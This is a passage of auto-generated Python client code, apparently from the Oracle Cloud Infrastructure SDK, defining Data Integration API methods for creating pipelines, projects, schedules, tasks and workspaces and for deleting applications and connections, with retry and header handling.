"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_patch_details,
response_type="Patch")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_patch_details,
response_type="Patch")
def create_pipeline(self, workspace_id, create_pipeline_details, **kwargs):
"""
Creates a new pipeline in a project or folder ready for performing task orchestration.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreatePipelineDetails create_pipeline_details: (required)
The details needed to create a new pipeline.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_pipeline.py.html>`__ to see an example of how to use create_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_details,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_details,
response_type="Pipeline")
def create_pipeline_validation(self, workspace_id, create_pipeline_validation_details, **kwargs):
"""
Accepts the data flow definition in the request payload and creates a pipeline validation.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreatePipelineValidationDetails create_pipeline_validation_details: (required)
The information needed to create the data flow validation for the pipeline object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_pipeline_validation.py.html>`__ to see an example of how to use create_pipeline_validation API.
"""
resource_path = "/workspaces/{workspaceId}/pipelineValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_pipeline_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_validation_details,
response_type="PipelineValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_pipeline_validation_details,
response_type="PipelineValidation")
def create_project(self, workspace_id, create_project_details, **kwargs):
"""
Creates a project. Projects are organizational constructs within a workspace that you use to organize your design-time resources, such as tasks or data flows. Projects can be organized into folders.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateProjectDetails create_project_details: (required)
The details needed to create a project in a workspace.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_project.py.html>`__ to see an example of how to use create_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_project_details,
response_type="Project")
def create_schedule(self, workspace_id, application_key, create_schedule_details, **kwargs):
"""
Endpoint to create a new schedule
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateScheduleDetails create_schedule_details: (required)
Request body parameter for Schedule details
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_schedule.py.html>`__ to see an example of how to use create_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_schedule_details,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_schedule_details,
response_type="Schedule")
def create_task(self, workspace_id, create_task_details, **kwargs):
"""
Creates a new task ready for performing data integrations. There are specialized types of tasks that include data loader and integration tasks.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateTaskDetails create_task_details: (required)
The details needed to create a new task.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task.py.html>`__ to see an example of how to use create_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_details,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_details,
response_type="Task")
def create_task_run(self, workspace_id, application_key, create_task_run_details, **kwargs):
"""
Creates a data integration task run for the specified task.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateTaskRunDetails create_task_run_details: (required)
The details needed to create a task run.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRun`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_run.py.html>`__ to see an example of how to use create_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_run_details,
response_type="TaskRun")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_run_details,
response_type="TaskRun")
def create_task_schedule(self, workspace_id, application_key, create_task_schedule_details, **kwargs):
"""
Endpoint to be used create TaskSchedule.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.CreateTaskScheduleDetails create_task_schedule_details: (required)
Request body parameter for TaskSchedule details
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_schedule.py.html>`__ to see an example of how to use create_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_schedule_details,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_schedule_details,
response_type="TaskSchedule")
def create_task_validation(self, workspace_id, create_task_validation_details, **kwargs):
"""
Validates a specific task.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.CreateTaskValidationDetails create_task_validation_details: (required)
The information needed to create a task validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_task_validation.py.html>`__ to see an example of how to use create_task_validation API.
"""
resource_path = "/workspaces/{workspaceId}/taskValidations"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_task_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_validation_details,
response_type="TaskValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=create_task_validation_details,
response_type="TaskValidation")
def create_workspace(self, create_workspace_details, **kwargs):
"""
Creates a new Data Integration workspace ready for performing data integration tasks.
:param oci.data_integration.models.CreateWorkspaceDetails create_workspace_details: (required)
The information needed to create a new Data Integration workspace.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/create_workspace.py.html>`__ to see an example of how to use create_workspace API.
"""
resource_path = "/workspaces"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_workspace got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_workspace_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_workspace_details)
def delete_application(self, workspace_id, application_key, **kwargs):
"""
Removes an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_application.py.html>`__ to see an example of how to use delete_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_connection(self, workspace_id, connection_key, **kwargs):
"""
Removes a connection using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/delete_connection.py.html>`__ to see an example of how to use delete_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"delete_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def delete_connection_validation(self, workspace_id, connection_validation_key, **kwargs):
"""
Deletes a connection validation.
:param str workspace_id: (required)
The workspace ID.
:param str connection_validation_key: (required)
The key of the connection validation.
:param str if_match: (optional)
